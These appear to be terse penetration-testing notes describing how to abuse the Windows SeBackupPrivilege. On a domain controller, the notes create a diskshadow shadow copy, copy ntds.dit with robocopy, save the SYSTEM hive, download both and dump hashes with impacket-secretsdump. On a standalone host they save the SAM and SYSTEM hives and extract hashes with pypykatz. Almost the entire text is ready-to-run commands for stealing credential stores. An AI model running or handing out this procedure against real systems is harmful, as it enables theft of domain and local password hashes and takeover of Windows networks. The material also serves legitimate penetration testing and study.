SeBackupPrivilege

On DC

https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/

Create diskshadow script to create backup of disk C on disk Z

cat > blas.dsh
set context persistent nowriters
add volume c: alias blas
create
expose %blas% z:

unix2dos blas.dsh

Upload script, run it, and copy ntds for backup

mkdir C:\Temp
cd C:\Temp
upload blas.dsh
diskshadow /s blas.dsh
robocopy /b z:\windows\ntds . ntds.dit

To extract password the system hive is necessary

reg save hklm\system c:\Temp\system
download ntds.dit
download system

Now it's time to extrack hashes from it

impacket-secretsdump -ntds ntds.dit -system system local

On Windows

Get SAM and SYSTEM

cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

Cracking

pypykatz registry --sam sam system